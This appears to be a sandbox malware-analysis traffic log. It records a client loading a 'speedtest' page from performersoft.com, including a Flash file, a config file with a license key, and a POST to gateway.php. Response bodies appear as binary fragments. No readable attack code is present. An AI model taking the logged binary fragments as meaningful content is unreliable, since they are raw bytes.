...%.6E....[<br>4...~..d..r..qg6..o...."9..^.].:[email protected].$..p-.P.@ ..<br>..............&.~....xq....."...L.........8.>C.f.....F.R.T......4.O<br>m1...S..<.OK.&.R5..1.^~X.ix.......K..~X5....X...Z.....;..n.H,......<br>.t..].L.E ..z".8..0.........0..~ V.z..&`..D....R..i...M.b..Wsy..3....A<br>#..%.kH...H...<A......JO....f!P.^.[...e.......( L.T.AQ .?.8{..DT...<br>.h..*...d.b.N.J`=..;.._.B.J*....GF.>...D..?.-.....5S.#.ehl.O.X@.]..<br>.f.....~MV.S...A.Z...b..".P..f...2g.7=0.....................Y...&.T.Gh<br>{p.Y|..h}..00..V.y(.Q..%O..H.....P.T..p......w.PFW..z6)..@o=.`Ln..</pre><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/style.css HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Content-Type: text/css<br>
Last-Modified: Tue, 11 Mar 2014 08:22:46 GMT<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
Expires: Sat, 09 Aug 2014 03:05:05 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><pre>995...............................|.c....>t...oE.(...#.Z..K......D.<br>f&H.m;..2yxx..........m-...........O..G....K.... ..a....p1.k...d....qA<br>R~. UA...E.1. "..%...%...9....;.w..5.7.R..L$...B.XQ....8..3)E.x..4-YU.<br>,?-H..4.)|[email protected]]h...,.-S.".......$P{GaW......Ba0<br>...0..J..5.3.?r...r{.%..............q...Br..J--y....3..P...ox.......O.<br>...V...<.p.S...k..bC*...>.......9E..*....\h.4pT.<..fu....[...<br>.j..'....@..<.O.9.%l..E-3.3.|..j.y4.'X....$...mO.....ok......W...R.<br>...$.XI\[email protected]....\....K..|......i].P..c..".yzC...}<br>..$u..1>-.-N....F..`L.HQhq...Q..0.....4...xD&@?.0....(r....g.......<br>O4....8Eg._.H...D.W.3......A..3....!vA._4.K........`.K .........nl..N.<br>[email protected].,...a.B.{.Z-....?.c.~x ..|./.-.XA...|..q........._.QJ<br>.K.uy....;J.U.7D...,...T....B[.k..`[email protected].&g<br>t;T........D.......%K...y.<..i[.^.u..h.zk5..t...A..%jwP..._H.......<br>......5......] ..%......].`r.T......O.H.....}~....{3...H. .NG.P.....4.<br>.h....@[email protected]..)....j..F..`).7 ..A..h.H.P~.r....5.. ....J%.y...n...<br>@.y*.7d.S.5X}...)..=.......^...%...(...6[n@:..xJ...f..[..={dh....E|.4.<br>..). kq............"5.....\o7...bD..z....)|m...o2=..8..y.4._..k./Y..~.<br>...A">..;.n,..0.ki.B.%s.V|[email protected].=.Ff....H^|......4..k......3...A<br>...... .Zg..'[email protected].!...........oFk;.h*.K.3Kn.M9..=Xq.}#.h...5<br>9.0.=..p.Q.`W{..jt.......*./L..,..[..(M..:.....^...:d....=..b.:{Z$..A.<br>..... ......]m..-..vQ.Y...."nz.}zd.....1...w.....6i.....x.07`...&_....<br>.a..sqK........o.j...2...G...A.Q.2.aoP.n`.......)qM.V........_....</pre><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/bg.jpg HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Content-Type: image/jpeg<br>
Content-Length: 8136<br>
Last-Modified: Thu, 07 Mar 2013 07:56:50 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "51384842-1fc8"<br>
Expires: Sat, 09 Aug 2014 03:05:05 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>......Exif..MM.*...........................o..........................<br>.................................................(...........1..... ..<br>...2...........i............. ............'.......'.Adobe Photoshop CS<br>5.1 Macintosh.2012:11:29 11:44:03...........0221......................<br>.............o...............................n...........v.(..........<br>...........~...................H.......H..........Adobe_CM......Adobe.<br>d.....................................................................<br>......................................................................<br>..........."................?.........................................<br>.................................3......!.1.AQa."q.2.....B#$.R.b34r..C<br>.%.S...cs5....&D.TdE..t6..U.e.....u..F'...............Vfv........7GWgw<br>........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%..<br>....&5..D.T..dEU6te......u..F...............Vfv........'7GWgw.........<br>........?..O......su.........W?...h......I.../.K...I$.L.o...I$.L.o...I<br>$.L.o...I$.L.o...If..'...hIt.c..~.>.._....I%..o....I%..o....I%..o..<br>..I%..o......Photoshop 3.0.8BIM..........Z...%G........8BIM.%.........<br>}.....pv....N8BIM.:....................printOutput........ClrSenum....<br>ClrS....RGBC....Inteenum....Inte....Clrm....MpBlbool.....printSixteenB<br>itbool.....printerNameTEXT.......8BIM.;....................printOutput<br>Options........Cptnbool.....Clbrbool.....RgsMbool.....CrnCbool.....Cnt<br>Cbool.....Lblsbool.....Ngtvbool.....EmlDbool.....Intrbool.....BckgObjc<br>..........RGBC........Rd  [email protected] [email protected]  </pre><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/speed-analisys.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/png<br>
Content-Length: 23992<br>
Last-Modified: Wed, 09 Oct 2013 06:56:42 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5254fe2a-5db8"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>.PNG........IHDR.......k.............tEXtSoftware.Adobe ImageReadyq.e&<br>lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe<br>hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=<br>"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &<br>lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"><br> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap<br>/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"<br> xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm<br>p.did:0280117407206811834F8E6FB6CF49D6" xmpMM:DocumentID="xmp.did:631F<br>E077273111E38F39D03AECE46BC3" xmpMM:InstanceID="xmp.iid:631FE076273111<br>E38F39D03AECE46BC3" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh"&<br>gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8EFABB5AAE206811B5<br>33BBD3FD57ACD3" stRef:documentID="xmp.did:0280117407206811834F8E6FB6CF<br>49D6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta><br>; <?xpacket end="r"?>..z(..Y.IDATx..}.`......ZiWZ....r.-.n,.Mqh.<br>L.....{.!.!..K.!!!..l.$.81....`.M16`.."[email protected]...<br>{...7...p<..&.h..&.|.D...&.h..&..i..&.h...~.h..&.h..K...2..?......;<br>.........PY.P.>...^..y....N....'...G........?...@0.>..X_0.z..o..<br>.!.....0.....z.?.L...>........../...|-..y..:./...........^,..r..<<br>;.....qO..p......b.p..q.....>4......./U.M4......`.......H.)...:$..h<br>[email protected]..|l0.t.A.....?..s.,....sx...]..n.....<br>..A<...m..r.. .. .C.n....}.._.&.h...5.)...L.a&.Eca.....U...x".G</pre><<< skipped >>></font><br><br><font color="red">GET /component/js/swfobject.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: application/x-javascript<br>
Last-Modified: Sun, 30 Mar 2014 11:59:34 GMT<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><pre>f6d...............w.8...... ....c..c. j^[email protected]$....<br>...`.F#i.gL../......p'i,.....4I..v..]nN.p.s..g.y;^.C..~...o.xq#.>g1<br>w....Q#..F.....sx....j.2.9..E.p3.&m_........9........[....G...I.0..5N.<br>..7.{.w..Q"..qI..4tnWl...}[email protected]..=..v..aw,1>...Kg...y.<br>.n.`. ......pg...'..]y........b...Hh....­\.1.cn|......`h|..s...O..qb<br>.SHL}...cF.h..^.....n..q.............C_5.[.... 6..f....m...`.`S....G..<br>..I.>\...d....ss.%.0......Q...6..'..wJ#6...1f.)a.#.1.....zI.<..(<br>.....f.a..k...O$.u[.v[......n>y.6..}....H.....r..lB.{....lD...w...x<br>.7[L. .3(.....F....a..c'..(...F..NAq.......b<........l.s...... !..%<br>...[.Q...1...._..HW....`oH.....Zy.f>....I...X..........E.C........a<br>&.....B.j...iu.......4..cP.%......u..I.wi.W..........1.|...,....y..Q."<br>".i..-.[...\A.............m..x\........0MS./.T..kx.x.....i.1c.........<br>...e..t.7..:.IS0......wz.....dR.h....t..I.Y.@).W>.y..~..m..5.vg..Q.<br>.._....7&.t......v..%....u......'<....&X#..z.a. ,d....!.\....o6..`.<br>.<I.3...oF.).^......E...c.a.....K.B!.(M.........F..... .....B......<br>...-}....,;\.>..5.t.U<....w^......./xu.]RY\..._.:..:j[7..1.vw..&<br>gt;.....Ty..N=..N5........`....&....K.q......{'-........$.v!.h...^.><br>;..v......!./?...|yz.&.O.2....U..!.U..V.....A...3..y..`.?&tQ.|A....H@.<br>.-....BvK"...fs....j.......s.;...aS..W..k.........~.)]...j.xYf...'I...<br>...} I..R...^......^..5.Q...C.`..sD.?..?..=s....B&6...k.....v.....X.r.<br>/......H.m.3Nh.Y.^t..6...2.......|.iI...6....U..c<..9...L..x.8<.<br>U....;...6_.wp'....V'..BV.5I....R.:&P..E..=|...^m.....BF.3rO....fL</pre><<< skipped >>></font><br><br><font color="red">GET /component/img/banner-pcp.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/png<br>
Content-Length: 67806<br>
Last-Modified: Sun, 30 Mar 2014 11:59:36 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380728-108de"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>.PNG........IHDR..............d......tEXtSoftware.Adobe ImageReadyq.e&<br>lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe<br>hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=<br>"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &<br>lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"><br> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap<br>/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"<br> xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm<br>p.did:7D3FCBF2AC2068118A6DC221D5A2430B" xmpMM:DocumentID="xmp.did:ED4F<br>524BAB4B11E39767E293BFCA1B3B" xmpMM:InstanceID="xmp.iid:ED4F524AAB4B11<br>E39767E293BFCA1B3B" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh"&<br>gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7D3FCBF2AC2068118A<br>6DC221D5A2430B" stRef:documentID="xmp.did:7D3FCBF2AC2068118A6DC221D5A2<br>430B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta><br>; <?xpacket end="r"?>Xn......IDATx......gy.....s.].Y.l.....16...<br>.....X.......B...8a...x.........p|...8.!` v..&6.0..K.,..%K#....u9...T}<br>]...#....^[email protected]...<=...D6Q...[-.k..8wxxxl........<br>Lf.u.Csss.s.3..Ri......F.A.B.. .0......5.M....U.V.e.[l...j...%.]....,.<br>r9.(...8.9l.ql...9....[Te.........}....c;..f.....T.Thxx........F.E.x-6<br>...9.-.......}.m.Q....L..O...f....sX.o5...|.....>n..Z.R.....>y.G<br>^&K./..C.Q...I.......E~\.{&..e..jUj..8i......c.-6.z...).W..\..^w.x....<br>.Y6&........k.1.\..3Yvl~..S.Y..;...^k5..x..|a,.68......zM...S.]{q.</pre><<< skipped >>></font><br><br><font color="red">GET /component/img/banner-sa.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 404 Not Found<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: text/html<br>
Content-Length: 564<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br><pre><html>..<head><title>404 Not Found</title><<br>/head>..<body bgcolor="white">..<center><h1>404 N<br>ot Found</h1></center>..<hr><center>nginx</<br>center>..</body>..</html>..<!-- a padding to disable<br> MSIE and Chrome friendly error page -->..<!-- a padding to disa<br>ble MSIE and Chrome friendly error page -->..<!-- a padding to d<br>isable MSIE and Chrome friendly error page -->..<!-- a padding t<br>o disable MSIE and Chrome friendly error page -->..<!-- a paddin<br>g to disable MSIE and Chrome friendly error page -->..<!-- a pad<br>ding to disable MSIE and Chrome friendly error page -->..</font>...<br>.</pre></font><br><br><font color="red">GET /component/img/whitebg.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/png<br>
Content-Length: 979<br>
Last-Modified: Sun, 30 Mar 2014 11:59:36 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380728-3d3"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>.PNG........IHDR.......;.............tEXtSoftware.Adobe ImageReadyq.e&<br>lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe<br>hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=<br>"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &<br>lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"><br> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1<br>.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/<br>/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo<br>shop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:ED4F5246AB4B11E39767E2<br>93BFCA1B3B" xmpMM:DocumentID="xmp.did:ED4F5247AB4B11E39767E293BFCA1B3B<br>"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ED4F5244AB4B11E3<br>9767E293BFCA1B3B" stRef:documentID="xmp.did:ED4F5245AB4B11E39767E293BF<br>CA1B3B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&<br>gt; <?xpacket end="r"?>.......EIDATx.b.............".P..X....b..<br>.A..,[email protected]`.</font>....</pre></font><br><br><font color="red">GET /speedtest/media/footer.jpg HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Type: image/jpeg<br>
Content-Length: 3691<br>
Last-Modified: Thu, 07 Mar 2013 07:57:04 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "51384850-e6b"<br>
Expires: Sat, 09 Aug 2014 03:05:08 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>......JFIF.............C..............................................<br>......................C...............................................<br>........................;......................................../....<br>...................!AQ..1R.a...2q....."B..............................<br>.................................?..N..................)..$..*.pYJE...<br>E...Ha]v.X....!.w...p.v..a...U.`]v...9{..2...qu..).....?%....n_.).^...<br>_.)....<.H...9..........JLNZ...i.^...."..5.|.I./s..|..'/u..JC....ZE<br>....JL0.i....9{...%".]m.JD..g..d.9{..2Ra....R//s.H....d.^^..?....]S..)<br>.^..i.^..).^.......]."r.[y......)....).>....9{..2Ra..v..!..m.R.b...<br>...`]m.JD....<.H..].!..v....9{...d.9{...y{..u....).......o.ZE.....R<br>...{|.H`]v.......{|.I.-sO...!..v....9k..t.E....%"G......p..|..Hr.=."r.<br>=.ez.//s...r.;yZD..i....9k..2R//s..."......9{..2R'-sO...!.Ms...JE....)<br>H....|.t./s...-u.{."..\....H.{..t.9{..2R,}=.~.2R'/u..V...{..t.9{...Hr.<br>=.d.\...u.N^..o.K.Y.k..D...}.JE...|.I..............}=......?Os..V....r<br>..Hr.[%!..m.JC.....).....%...[y)........)19{..2...s..R.....xr).^......<br>..].ei10.vJB>...o.).^..o.ZB~.......//u^."r.].g..C..o3.R....H`\.....<br>^....."r.=.d.0..).^.....r.].d.X.{..C..o2R...j...]...)H`\..)......~JC..<br>..%..qu..........pn...L.....&..4)...b.....0..#<.v*'..R..)..........<br>....................J..UPPj..... ..P.T..E.Y!N".jB.$*q..R..!S..Z..|u!R-<br>..R....*B...8.R$. ...N-HU..)...N".k..q...D*.g$*q.....R....D*..N(..qA.q<br>..R.8..8..Y........D)......&...8.R.)..B.j.U...!N,.S..S..8.U.d*E..k...D<br>)_R.x.T.!W.r.8.U...h.^".*B...q..HR.)].S.."z..HR.!J.....h.Z..HT...Y</pre><<< skipped >>></font><br><br
<font color="red">GET /component/logics.swf?nocache=9082 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
x-flash-version: 11,6,602,168<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: application/x-shockwave-flash<br>
Content-Length: 37670<br>
Last-Modified: Tue, 10 Jun 2014 06:34:05 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5396a6dd-9326"<br>
Expires: Sat, 09 Aug 2014 03:05:12 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>CWS.&;..x..|.\.G......=......'.....cM..F.J.E4(.w...w.;.LS.bb.%jLL.].G.<br>.&.tAlo..jzo&&...}.;.................>.,......<(.(...$A...../..b<br>.K.& G...k..4\P.{..#.rk..V....kmE. Y..k..f. .9y....;...........:...^..<br>......fX].s.Y0..B. ...]\*.............'.k.{.|.;.......Z(,Hxc..m..n.a..<br>....'.....C.........Ix.:....e..............[f....O>[.[...gc6~3... u<br>.?]....k...p/..l.....&..a.}......M..o....~p...^.....)..W~..V8...#.._..<br>.......|.u.s.....{W..qS....gG....d..Z...._...;..y]t. .l...w.hN..0.L...<br>...O...r.. .....m.....^...........!.6Ax....T..K.Mo..<1;..Y.....b.5.<br>b.97.\.< $...(...W.(=..h.}Kf...,.uc....~....i.n.rr.W.!.. ......a..~<br> .....e.,][email protected]. ....0.W.aA\.$.<v...._.=.l.d^....~.<br>....Nj....2.........C ^x..'..tui..1.l..g..}.}......]~...~^.oW...v....I<br>....j......6lo.p.........IBr.......z...........n..?6.......g.s.v.B.c&.<br>UK........j...?0.yi.Ok...m..c..%[..(~......;o.zC[P..W}.......O..]...b.<br>.!.{..lH.o^..sl.......3s...J.._N-}l..Qw..Q.&a......m...V.:.&...tk..E..<br>.]..57.?=..|.G....6..U>/..`..Z&..wx. .._[.....D..........-.......R)<br>9..........?>.....6....k.a.~..=.T.Z.`JM........oFI...\*...&X_./~..`<br>..L_H...$....$.C.W..B........ .....Y....]..j..P..f......ag....K._z5.xp<br>.A..O.h....b.0X..`...N...d.R._H..*|....Q.'.....|./..3...?..s...9..x./.<br>9=.....p\.%m.e.....x.<.....O......gy.y.cL.....q..........g..E...d..<br>.\.|.B..).....8...\.......U.|......].<....^.k.8....g...9...4p...9.9<br>.sz...Y,.[,.[,.[,.[,.[,.[,.[,.[,.[,.[,].......o.......c./...,..-..-..-<br>.dbL..b...c0.".a.g...W1.%..#\../....'..2a.4`6.F......9..L.Lh5..g.o</pre><<< skipped >>></font><br><br><font color="red">GET /component/config.xml HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/component/logics.swf?nocache=9082<br>
x-flash-version: 11,6,602,168<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/xml<br>
Content-Length: 223<br>
Last-Modified: Sun, 30 Mar 2014 12:24:17 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380cf1-df"<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre><?xml version="1.0" encoding="UTF-8"?>.<main> .    <lic<br>ense> .        <customer>ibario</customer> .        <<br>;domain>VVV.performersoft.com</domain> .        <key>91<br>4b0bde6ff65c7fc05486bdcca65506</key> .    </license> .<<br>/main></font>....</pre></font><br><br><font color="red">POST /component/gateway.php HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/component/logics.swf?nocache=9082<br>
x-flash-version: 11,6,602,168<br>
Content-Type: application/x-www-form-urlencoded<br>
Content-Length: 44<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
